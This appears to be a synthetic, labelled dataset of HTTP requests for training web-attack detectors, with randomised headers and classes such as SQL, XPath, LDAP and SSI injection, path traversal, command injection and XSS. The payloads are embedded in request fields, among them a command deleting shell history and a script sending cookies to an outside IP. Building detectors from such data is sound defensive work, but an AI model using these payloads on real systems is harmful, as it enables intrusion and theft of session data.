Accept-Charset: iso-8859-6;q=0.8, euc-tw;q=0.0, windows-1250
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 249.225.32.40
Cookie: ieArhRi1dxew=7Iem;ensa3oqTphy=aevalmt;0neRnNAea;otpaTewcoradsni=6prfttnsts)iwgincluden3e;ftdacuuacn=d;zb5j;erMdebQpr5tlRsr=422201547
Cookie2: $Version="15"
Date: Thu, 04 Feb 10 22:51:48 CET
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Tue, 24 Mar 09 02:34:02 GMT
If-Unmodified-Since: Sun, 09 Apr 06 21:55:04 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 14 Apr 07 01:02:35 GMT
Max-Forwards: 4
MIME-Version: 5.1
Pragma: n='welFm'
Proxy-Authorization: 2oson 6aanekr=etytqel
Authorization: NTLM Y3RzYnN2Y2VubG4xZTBjZG56ZW91aWxlV3RhbnlycGZldA==
Range: 827-
Referer: /8Whro/ettFndu/mdeieui/eThehrs.exe
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: ealdkotxe
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 1501x189
Via: 9.7 www.dyo3eslN.png, FTP/0.2 www.aica.tiff, 5.8 www.rsind045.html:514
Transfer-Encoding: gzip
Upgrade: fnueh/3.8, a9n2i9/3.6, nbit/5.9, ydtTto/6.5, ryee5/2.9
Warning: 038 www.Iwehs8.jpg "pwentl6I1attqrfteiY" "Sat, 05 Jan 08 22:01:37 UTC"
X-Forwarded-For: 175.18.32.237
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44115
Start - Id: 43295
class: OsCommanding
GET /aURNwfw1s8w.irCS9Ju7/paadminyGtu/T4gX/mVq@.H0dfN4S6tR5/rZCe3varddscancZ5Z/sIcxgk_Js7msK2_1bz33/iC/epobM/esilgStotgtaeyaaal0/MjhB4.idWwJ4@-Q/puW6zdggy-lYHt7RQ6Tq/99.tiff?6Fshaving=rmgOUm9ydieNdinda&elre=brdbino8iTipoiw%3CNsnro&aiVsarnymre=70790665&U3Vc-OvVrQbetween=%27%3B+rm+%7E%2F.bash_history++%3B&eDBhSoj=605869891&6Pxl=+stsVs%5Bdoe%5Ciyokc&ilEyAy=sTtd2khJb HTTP/1.0
Host: www.paAdlHe.biz
Connection: ie5tHi
Accept: */*
Accept-Charset: koi8, x-mac-roman;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-cache
Client-ip: 139.145.50.245
Cookie: 3locationh1=mPro8vtuju;toimcsegjwttsw=tmptgr3=ths;s2nE=eE/9%darA[Brg;cs1D6=rooPsstylen 1nh5c;AU5SGai=7855309
Cookie2: $Version="43"
Date: Thu, 06 Apr 06 24:37:50 CET
ETag: "6dhinw17JjJyr_-."
Expect: mb9t=tpt6m;rlemLtar
From: nJanczi@m0dios.gov
If-Modified-Since: Wed, 15 Aug 07 18:00:29 CET
If-Unmodified-Since: Sat, 06 Nov 04 16:09:13 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 05 Nov 04 11:12:06 GMT
Max-Forwards: 82
MIME-Version: 0.7
Pragma: ns='e'
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic dG9ybGdoaTpvaWhtbmVoZQ==
Range: 534213-
Referer: /eOee5rel/twgam/sa3nQet/lsonlyom/ermwftuA.mp3
TE: gzip;q=0.0
Trailer: Range
User-Agent: ltsewjrehw6ie6uf3z4
UA-CPU: MIPS
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: HTTP/2.6 200.86.88.200, izekyc/8.6 www.ys1ea.tiff
Transfer-Encoding: compress
Upgrade: hhiwe/3.0
Warning: 762 www.yeOb.jpg:21 "ceecrp" 
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 33268910997830583
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43295
Start - Id: 45795
class: PathTransversal
GET /lVGVUD-DjB7.jpeg?Ee4tdlf=%7Cma%2B%7E&n4iuk=2itgaadncfirftw&oxfenu=rJh52M&thiyyE=khTilahen&nfpnsafc6aIy=totr&FLRinputv2=+passwd-s&zoinU=4KfeVE-dEEx9&ltstaae3hlooq=%27%3Dyofhnetcat%24detq3h2&ttret4=e%3A%5Cautoexec.bat&m.uRdp=cgroup+byinhnczv&eEcieTRrm=66054811&fZuF_9in=ds&7Oc9otbsnkhanne=fmwzH_eqSNB7&s5eiin=hsdo HTTP/1.0
Host: www.jhGs.it
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: meue='Darose7n'
Client-ip: 197.37.232.188
Cookie: ssxatt=eNY4mlm
Cookie2: $Version="08"
Date: Mon, 27 Oct 08 01:50:45 UTC
ETag: "9GnhRAmRvCoiz6Yum"
Expect: 100-continue
From: erir5sT@dLha.org
If-Modified-Since: Wed, 19 Jul 06 24:34:04 GMT
If-Unmodified-Since: Thu, 22 Apr 04 15:12:32 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Oct 04 04:01:46 GMT
Max-Forwards: 5
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Basic dXlpYnc6ZW5OZWU0cw==
Authorization: attw a47eyc=nmsre7b
Range: 151606-
Referer: /khae/aenbAwin/ietsng/lacLoo.msf
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.0 (Windows; U; WinNT 6.8; rt-ug; rv:3.4.0) Gecko/13834852
UA-CPU: PowerPC
UA-Disp: 1489,7899,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9422x259
Via: HTTP/8.5 230.169.217.89, 1.3 www.FLohqhp.tiff
Transfer-Encoding: identity
Upgrade: T7eg/6.6
Warning: 610 192.1.135.3:2396 "ysstaeiltotrenks" "Sun, 26 Mar 06 18:59:14 UTC"
X-Forwarded-For: 71.201.98.2
X-Serial-Number: 06918680418533
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45795
Start - Id: 38225
class: LdapInjection
GET /wahrpneulsheesaBv/bhtt/nOTsFAS1N6.G5Cxu5-IG/3EHMW/urDlfte6PF1R/slihxhe3iedsf/5NBD4yU@sp/sN9J5GV4Wobject/iRgfuCzzFHWEORq1/Ps.cgi?wseiOSsa=146148&a1si=aaafaaare&vrdkarj=8649&iKaeTNroienui=lP-12HT9a&x35acX8wvf1t=mraonautoexecTEeeaA&sii64=507&dn9fsineeoO=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&dks4=20469818 HTTP/1.1
Host: 186.64.163.57:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: us-ascii;q=0.9, x-mac-ce, x-mac-ce, iso-8859-1
Accept-Encoding: 
Accept-Language: at-buT, n1xi-iht;q=0.4, l-oen6su, e2tg-aawta;q=0.9, h-Mxo2Ro7
Cache-Control: only-if-cached
Client-ip: 136.113.62.155
Cookie: sess8tpe=ta?bhetissE
Cookie2: $Version="541"
Date: Fri, 29 Jun 07 15:47:17 CET
ETag: "HeHqGgYUuhkexda"
Expect: 100-continue
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Tue, 04 Mar 08 02:45:37 UTC
If-Unmodified-Since: Wed, 17 Nov 04 06:50:36 CET
If-Match: "l3Wr.s4F_oiop.mOHf"
If-None-Match: "g_O7HygPtwouSJqf"
If-Range: "SUcgkXw5_@-fmcnAyIrF"
Max-Forwards: 69
MIME-Version: 3.2
Pragma: ti=ahtpwEni
Proxy-Authorization: Digest nc=1EEE7Fe7
Authorization: sipa oedx=TDdea
Range: 491-,605-2708,157323-67914
Referer: /u2FTLooo.php3
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.2 (compatible; MSIE 0.6; Linux i586; nelnri; iehtar; rvixlit7ei)
UA-CPU: Sparc
UA-Disp: 782,245,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 321x2267
Via: FTP/9.6 153.243.239.113, HTTP/2.0 27.189.123.231, 9.2 232.132.70.100
Transfer-Encoding: compress
Upgrade: sdlwO/6.2, 4Awth/6.5, lsy/1.6, jri/4.6
Warning: 794 74.86.217.193 "6bkyotjee" "Mon, 16 Feb 09 06:30:50 GMT"
X-Forwarded-For: 10.141.187.50
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38225
Start - Id: 47338
class: XSS
GET /iTJySGS4tqpe7q_7yzOy/950q2CMwzg.-d/orEnMcgmZezj/ythqr7gemCtlnslietle/2soTenezRwkeeSa.gif?eobaeen3e=e8nTmt2bMoBle&9A2I@1OT_Y=cMSuu_dAq&UKmObodyN=8681&iereZres=arn0OloLli4a&cFhr=%3C%21--+--+--%3E%3Cscript++++%3E%5Bwindow.open%28%27http%3A%2F%2F223.117.93.51%2Falst.aspx%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E%3C%21--+--+--%3E&eDGeslchdt=ynecCy&tdaecesebnncsor=mggsgtyclg&giddsorst=moadminemail HTTP/1.0
Host: www.rulndaxe.org
Connection: AurR
Accept: text/plain, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 88.199.53.236
Cookie: tii=924405
Cookie2: $Version="9"
Date: Wed, 18 Oct 06 23:45:17 GMT
ETag: W/"5grenAzcmdh-dh.U6"
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Tue, 26 Feb 08 16:15:32 GMT
If-Unmodified-Since: Fri, 12 Feb 10 14:21:08 GMT
If-Match: *
If-None-Match: "Kdktep5DD.clQHSkjkz"
If-Range: "egfgo4bKzrZfUZq"
Max-Forwards: 890
MIME-Version: 4.9
Pragma: l=i
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest realm
Range: -066761,152-
Referer: /8c98/elrsamw/zncsu/dhe5ndvu/pnrase.avi
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/0.7 (Machintosh; U; PPC Mac OS X 9.4; tx-ee; rv:5.6.5) Gecko/21996311
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/5.9 176.31.159.123:6
Transfer-Encoding: compress
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 412179
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47338
Start - Id: 40528
class: SSI
GET /2ktqrHgdnnlniee4/wleuasnehndtea.css?TsirhEn=7I0c2u4gJb&anxsfuToiasepfp=%3C%21--++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&RsdP.A3T=4332738 HTTP/1.1
Host: www.TnauO.cz
Connection: lAfgte
Accept: */*
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=687
Client-ip: 109.86.93.38
Cookie: rmmif1etUs=rVe;atehrn=b/ebrm6l5b rtnobr;rtfEcsdaais2ol=y8a6helqdmetcteh6
Cookie2: $Version="385"
Date: Tue, 31 Oct 06 15:48:34 GMT
ETag: "G5thXp8xs5cDE.veI"
Expect: e7eTihs
From: phta9t@exney5i.com
If-Modified-Since: Mon, 12 Jan 04 17:11:54 UTC
If-Unmodified-Since: Wed, 14 Dec 05 19:24:22 CET
If-Match: "SP5Pa2DHC3UJLfOp.5G"
If-None-Match: *
If-Range: "2Rl.-qcg0dc1sPXbthWB"
Max-Forwards: 6
MIME-Version: 3.5
Pragma: tx='ls'
Proxy-Authorization: NTLM OXJ3bGd1ZWFnZWVTbnRzMHhpT3dlYmI2bzZweXR0TGY=
Authorization: Basic ZXRycm86dGJjZQ==
Range: -7451,575-,572-
Referer: /eaenaj9.jpeg
TE: deflate;q=0.9,gzip;q=0.4,trailers
Trailer: Max-Forwards
User-Agent: ptorKiidU
UA-CPU: MIPS
UA-Disp: 5153,3619,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1239x334
Via: 6.8 161.197.222.122:16
Transfer-Encoding: qrHt
Upgrade: dwen/0.1
Warning: 706 www.8omhtse.shtml "seeiifggsn7jjfoai" "Fri, 07 Dec 07 06:30:57 GMT"
X-Forwarded-For: 93.190.193.214
X-Serial-Number: 61054598804485092045
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40528
Start - Id: 48315
class: XPathInjection
GET /dnUkv@Z.gif?aFnthhiwayG=uTJd HTTP/1.0
Host: www.Ls0stchu.de:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: compress, gzip;q=0.7, compress
Accept-Language: hsorAr-mrwaiugf, hhbf0fsb-89, dRupe-eemn
Cache-Control: only-if-cached
Client-ip: 30.17.183.26
Cookie: ulilmttbi=a<lxlet;utlt9ethd=hntv
Cookie2: $Version="7"
Date: Sat, 24 Oct 09 04:18:48 GMT
ETag: W/"8bryrAVeHZlsVcY0"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Sat, 26 Feb 05 07:01:52 GMT
If-Unmodified-Since: Sun, 04 Oct 09 19:49:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: qtfde 1Tic=etNhghne
Authorization: Basic b3NpdjpIaWVrbnI5aQ==
Referer: /eYiehmSt/ttl9oq68/tbiEr.jpg
TE: trailers,gzip;q=0.4,chunked;q=0.7
Trailer: If-Modified-Since
User-Agent: 3m4t0nsh'     or   path/child::node()[position()=N]     or 'c6deahgt'='
UA-Disp: 296,6544,16
UA-Color: color32
UA-Pixels: 433x249
Via: 5.1 www.cgDcrq.htm, FTP/1.1 51.255.105.88
Transfer-Encoding: identity
Upgrade: ggwu/8.7, eaee/3.4, wiazc/3.1, tznuol/7.6, gfi/8.6
Warning: 835 www.tlNlwgs.gif:920 "iep7CLmofu" "Sun, 29 Feb 04 15:41:20 GMT"
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48315
Start - Id: 48556
class: XPathInjection
PUT /PGMttH/r8rv/1-S6AfR3MzbpW0F./Ey/yU/xihCRvTO80DStAp32/e_VmC.@qwhHsbdPGs_.jpg? HTTP/1.1
Content-Length: 195
Content-Language: iripHh1D,bTrihh
Content-Encoding: identity
Content-Location: http://mherf.biz/s7rmhe.pl
Content-MD5: ZTlVb2x2ZWdDbmRMaXVyOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 01:33:25 GMT
Last-Modified: Sat, 05 Aug 06 17:40:46 UTC
Host: www.v8svBEosab.st:82185
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: gzip;q=0.5, identity;q=0.2, compress, identity
Accept-Language: *;q=0.6
Cache-Control: min-fresh=87
Client-ip: 26.231.14.90
Cookie: OntOpeu=8708;uneBdhly=58167504;ioomrzrs8=977421;qvOuuj4Eag1lne=0t sOtaoopene&t;
Cookie2: $Version="8"
Date: Thu, 29 Jul 04 17:18:00 GMT
ETag: W/".NpEoPMJ922d-Z-plN"
Expect: 100-continue
From: w3nw@eoeld2.be
If-Modified-Since: Thu, 13 Nov 08 12:05:24 UTC
If-Unmodified-Since: Fri, 27 Feb 04 02:00:01 CET
If-Match: "j7K8d-c1C3Z8cCBCAw"
If-None-Match: "Qa7LaSaBTatjg2uP6Ru-"
If-Range: Sat, 15 Sep 07 20:16:09 CET
Max-Forwards: 0
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM aWlsc3Bvc2V1dG9laHRjZXJXb3V0b2VpaWFlZWVyYWF0dGZ0YWlJbGE=
Authorization: NTLM cm1zbFN2OW5hdHlkYmhmb0xrZ1lpRTRhb3F0c3B5ZFNob2UybQ==
Range: 937233-073734,-13,-768
Referer: /ceieso/ewaynoia.pdf
TE: trailers,deflate;q=0.7
Trailer: Via
User-Agent: Mozilla/3.9 (X11; U; Solaris 4.6; js-Sd; rv:9.4.4) Gecko/82156422
UA-CPU: StrongARM
UA-Disp: 2908,9185,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 429x1759
Via: HTTP/8.0 www.NdhwVFa.jpeg, 3.6 www.hOtna.js, 6.0 www.sehtk9.tiff
Transfer-Encoding: deflate
Upgrade: lexe/0.2, mX4rfi/5.5, ue5de/1.9
Warning: 221 www.Tjeo.jpg "mhTIthjmdIiio6h9eh" 
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 63432598525498098
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eafeecdNeetE6Rf=(i  < count(ml/child::text())  and  j <  count(ebiveh/child::comment())  and    k     <     count(4qEt8/child::*) )&oG.2o3r=hTkM-My

End - Id: 48556
Start - Id: 41207
class: SqlInjection
GET /sTfVQvFUxYY1Hg_0WG_/xhtlcwQztnzphhSen/MUdlocationwinnt/OR89W8S-Px/heD2Zka2Sk7EVHM/lCvIEjLmoIQW5cc5/hm.mdb?sel=9dlrp7unataates&Nsaubd=t%3Drep&lthra=%27rhSstyleog%2B&eaj=8&heneaywbltl2t=2&4l=cl%24mhecdAmueq8 HTTP/1.1
Host: 211.186.42.177
Connection: e3eete
Accept: */*
Accept-Charset: x-mac-korean;q=0.4, utf-8;q=0.4, us-ascii, utf-7
Accept-Encoding: OR    'n6c'     =   '   '
Accept-Language: *;q=0.3
Cache-Control: ms='g'
Client-ip: 116.254.118.56
Cookie: isiFsptoh2r=638;OP6hZ-Wp1v=ysmaild;esesjicSo4=4;prdnwQooeoona=riei ao3)
Cookie2: $Version="19"
Date: Tue, 03 Aug 04 16:27:22 UTC
ETag: "y_rtOdxyriRe@WzUIbK"
Expect: iite=iaeqd;nirtl
From: tercor@topretr.biz
If-Modified-Since: Sun, 30 Apr 06 01:53:50 UTC
If-Unmodified-Since: Sun, 07 Sep 08 23:57:51 GMT
If-Match: "9XHerSZIht5Wg@VJMa"
If-None-Match: "7dEOX6ERtmr7NHcFUO"
If-Range: "xg959zMAR-AA@b4k"
Max-Forwards: 6
MIME-Version: 0.2
Pragma: eae7=lS7
Proxy-Authorization: Digest uri=http://www.aabnei.st/T2mnZiu/n1sace/ntAt/ohsoyate.jsp
Authorization: Basic b1N0Z1M5ZXI6M3lob3M=
Range: 53-4,37-,6-8482
Referer: http://www.aetehSx0.org/Eui46z.pdf
TE: gzip,gzip,trailers
Trailer: Expect
User-Agent: Mozilla/0.8 (compatible; o76enerttn; Unix; 4fx5tiao; o8rarworhe; NeolecaKv)
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9140x4441
Via: 7.0 185.89.50.166, HTTP/1.4 www.weseGne.js
Transfer-Encoding: identity
Upgrade: tiucmt/8.8, gTet/0.0, acopr/9.9, uni/6.8
Warning: 023 www.aubonl.html "brwUpele7rpookpse" "Tue, 09 Mar 10 24:01:48 CET"
X-Forwarded-For: 193.219.83.250
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41207
Start - Id: 36219
class: PathTransversal
GET /error/\..\..\..\..\winnt\win.ini? HTTP/1.0
Host: www.8Zpgd.de:21
Connection: keep-alive
Accept: text/plain;q=0.3, image/*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.2, deflate, deflate;q=0.1
Accept-Language: te-h3xe, oeNj-ercto, nhe5tmh-Ocer;q=0.1, chqly-eqs;q=0.3, eClihs-dcs;q=0.7
Cache-Control: max-age=125
Client-ip: 253.92.235.246
Cookie: A0ruzsuariit=csm2Ce5Ruyihlsdh;wouervt=rhwflIqdyehH;JqFTsE6=g/f+;1a=e6eir
Cookie2: $Version="6"
Date: Mon, 24 Aug 09 12:01:21 UTC
ETag: W/"3f1XJysaM8JKnKP718"
Expect: b5ooxi=dd0uA
From: aesn@tdnix0ah2.ch
If-Modified-Since: Mon, 21 Feb 05 05:42:28 CET
If-Unmodified-Since: Wed, 24 Jan 07 22:45:30 UTC
If-Match: *
If-None-Match: "L5ApjO1QIDT3CZbXXwz"
If-Range: Fri, 01 Jul 05 03:25:10 CET
Max-Forwards: 8943
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Basic YXVkY2VyeDo4U2Ft
Authorization: NTLM YWVjZTlzYU45cmVub3RwVGVldGJpZ3RvdGw0ZXRsZkVja21zYnRuamk=
Range: 183-
Referer: http://nIenrl.cz/tTrut/ohpooh/miaRT/doirime/eanucv.swf
TE: trailers
Trailer: Accept-Language
User-Agent: eehekrhmg/2.5
UA-CPU: StrongARM
UA-Disp: 399,5892,8
UA-OS: Win98
Via: HTTP/5.2 www.eri0ib8.css:8671, HTTP/5.1 www.aneebj.shtml, HTTP/7.0 www.Abtrtn.html
Transfer-Encoding: gzip
Upgrade: eEi/2.2, aafe/8.5, gceaso/0.6, aWa/4.3, tiau/5.9
X-Serial-Number: 003494109
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36219
Start - Id: 42048
class: SqlInjection
GET /tleEGtS1G.67X/AarhrCeyteEq5smo1/c3cCGGh/2JCXv@v3i4bX/2o1n1/0Xn/sq/HrzX5Toq/lR2XvAS.iyD/zLP0.bin?epheNmtig=46583&3heiu64nce=%27+%2F**%2F+++OR++++%2F**%2F+++++%27o3atb4tm%27+%3E++%27S HTTP/1.0
Host: www.hane.biz:614
Connection: iyn60
Accept: */*;q=0.0
Accept-Charset: big5;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: gri0-ouEyD;q=0.9, ood-ln6tcee1;q=0.2
Cache-Control: rti='Eaar'
Client-ip: 238.155.89.77
Cookie: tdEDt61bn4o=85EYf.HLVsWl
Cookie2: $Version="46"
Date: Sat, 26 Apr 08 12:27:27 UTC
ETag: W/"uOk-Ks6myYKrSBH2D"
Expect: 100-continue
From: lhrrhh9j@48Flats.biz
If-Modified-Since: Sat, 15 Oct 05 14:51:36 UTC
If-Unmodified-Since: Mon, 24 Nov 08 08:07:36 CET
If-Match: "UAu7Nxi2ofVptVy"
If-None-Match: "YUHoO.iq_-Dgw9yy5"
If-Range: *
Max-Forwards: 5
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest uri=/neea/saey/0utrm/jhmnwu/0i4ehle.dll
Range: -7
Referer: /EuLdchsd.css
TE: trailers
Trailer: Host
User-Agent: yeio (hmPARE4p2; slQPmt; pV9UN8Q)
UA-CPU: x86
UA-Disp: 7502,392,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 307x472
Via: 4.1 www.a6Uc.css, HTTP/1.1 www.St73S1.shtml, 9.8 25.247.167.201:2
Transfer-Encoding: gzip
Upgrade: ilnpe/6.7, ieqo/6.7
Warning: 362 154.207.249.192 "5mtmteeoeiermsUflat" 
X-Forwarded-For: 183.45.204.126
X-Serial-Number: 001394948859071824
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42048
Start - Id: 40360
class: SSI
GET /7o6X45/t-a2L_/NoV0l.png?RvLW=lib&jty7dtkgas4hlut=+su%3ENemhcT&mnrmo=nresor&ewSiscript519U7=lkpe&u5hdzuft=oOimateeoqhbol&0i8GkntH=iheeta&slsupdateYYhpassthruKgPMb=4aE6&8e=i6U&aAVfrIpsm=sie++%3F3e+e%28ai HTTP/1.1
Host: 188.114.206.138
Connection: g9owAord
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: <!--   #include   virtual="d:\windows\autoexec.bat"-->
Accept-Language: dsf-nehtet;q=0.0, df-at4, nY-erldHdq, z-o;q=0.1, nsfe2Ik-N1nugd
Cache-Control: max-age=92
Client-ip: 245.2.64.69
Cookie: IuiEu=17766;mhFenn1Efmde=0tnralselslb;a1=eJJ6f
Cookie2: $Version="4"
Date: Fri, 04 Mar 05 04:48:31 UTC
ETag: "Rx_E-BR84jvDVoRCBf"
Expect: dyooSh0e
From: ouihnh@oa6f8eoet.gov
If-Modified-Since: Fri, 21 Jul 06 22:05:08 CET
If-Unmodified-Since: Sun, 11 Jan 09 09:23:45 GMT
If-Match: "4gEBWt9ljvxdqziM"
If-None-Match: "kMB7OqcuvssF0b_rd"
If-Range: Wed, 15 Apr 09 15:47:08 UTC
Max-Forwards: 23
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic RHJkOTp5dGFyNG8=
Range: -62942,193769-
Referer: http://Otin.biz/imrnrrby/ghd7dsea/fidb/tpNvsiw0.png
TE: chunked;q=0.5
Trailer: Referer
User-Agent: ietrelaOaoNonsftxg
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Pixels: 7186x8117
Via: 7.6 161.93.150.224
Transfer-Encoding: gzip
Upgrade: fwr/8.8, o6abt/9.6
Warning: 214 www.ioarta.gif "t2kbllTyjTr61loIramt" "Sun, 01 Jul 07 21:32:40 UTC"
X-Forwarded-For: 76.58.9.70
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40360
Start - Id: 48536
class: XPathInjection
POST /leFaeeahniMJpNnn90nc/DOfromzKi9Z8u/iL19I9E.3P_.qTO/mI/OiOlme2n8psno.cgi? HTTP/1.0
Content-Length: 167
Content-Language: a,seqi,eshjfa
Content-Encoding: compress
Content-Location: http://i0sTri.fr/ntex7/lEsmec/usetatt/30dm.swf
Content-MD5: ZW5sNmFlZWF3cm9yZWp3YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 01 Apr 09 08:11:59 UTC
Last-Modified: Sat, 18 Jul 09 01:47:21 UTC
Host: www.o2aeEtcgin.com
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: nutGh-tfu, ste-7;q=0.7
Cache-Control: no-transform
Client-ip: 61.82.105.60
Cookie: tvl9ed19poeuh2O=hbsTtGhtsUhEsef
Cookie2: $Version="714"
Date: Fri, 13 Jul 07 17:52:33 GMT
ETag: "GcXnmUBFxWJV.V3_q"
Expect: ulHtWen3
From: l7hgtc@eorr.be
If-Modified-Since: Fri, 03 Aug 07 16:03:48 CET
If-Unmodified-Since: Tue, 01 Jun 04 24:59:27 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 27 Nov 09 10:38:06 GMT
Max-Forwards: 0245
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: hheeaG dehOfn=ka3m
Authorization: Basic c24wb2RvdTp6bmhhdGU=
Range: 8664-
Referer: http://iintic.ch/lusur/d1ls.mspx
TE: deflate;q=0.4
Trailer: Max-Forwards
User-Agent: eIHUKj http://www.h2cot.it
UA-CPU: StrongARM
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3038x174
Via: 9.3 189.251.16.174, 7.0 52.194.128.111:54646, FTP/1.8 www.0onii.html
Transfer-Encoding: gzip
Warning: 055 209.226.85.199:70292 "mEpIrti5alp3ed" "Wed, 13 Sep 06 22:52:18 CET"
X-Forwarded-For: 252.38.234.200
X-Serial-Number: 7572286452988
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

3S2V6M=rba&insertMah41eLKk@Z=ix' or     nn/9f/child::node()[processing-instruction()=879]   or   'xtF'  = '&lortatncs6Om=0 acceptccdte5

End - Id: 48536
Start - Id: 48201
class: XSS
POST /rmEanateucosnc0/fCE/oI/wiwSNHkfK5-N/nfbbieh.png? HTTP/1.0
Content-Length: 60
Content-Language: yltpt
Content-Encoding: compress
Content-Location: /dehml/hpriX.rar
Content-MD5: cnNvc2h0YThpbFdtbHNmcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 13 Jan 05 06:32:48 CET
Last-Modified: Thu, 10 Aug 06 19:02:21 GMT
Host: 11.1.48.14
Connection: keep-alive
Accept: video/quicktime, application/rtf
Accept-Charset: x-mac-ce
Accept-Encoding: 
Accept-Language: <div  style =   "     width:    expression([alert   ('ho9iy24ra');]);    "    >
Cache-Control: s='14aowv'
Client-ip: 198.54.180.201
Cookie: Iherati=1999;nvheamcmtuceo=s2wtUv4;KwgetX2CSN=538082;XincludeTCbq=42688;ni53el=telnetxe1dreplacee9rosystemEt
Cookie2: $Version="058"
Date: Mon, 16 Jul 07 18:34:54 GMT
ETag: W/"@iGFPbXMjkF2uvK4kpY"
Expect: 100-continue
From: nio6@slo8Cr.fr
If-Modified-Since: Wed, 14 Oct 09 09:28:31 CET
If-Unmodified-Since: Fri, 08 Jul 05 11:53:21 CET
If-Match: *
If-None-Match: "kEDcfSGTrOO11J.Mfy5A"
If-Range: *
Max-Forwards: 74
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest username="moie1"
Authorization: NTLM Z0luc2FrbG5hbnVudUt5cmFtd2Vkc2llcm10NmVyNG10YXRv
Range: 86-
Referer: http://btt6.it/9oshnta0.nsf
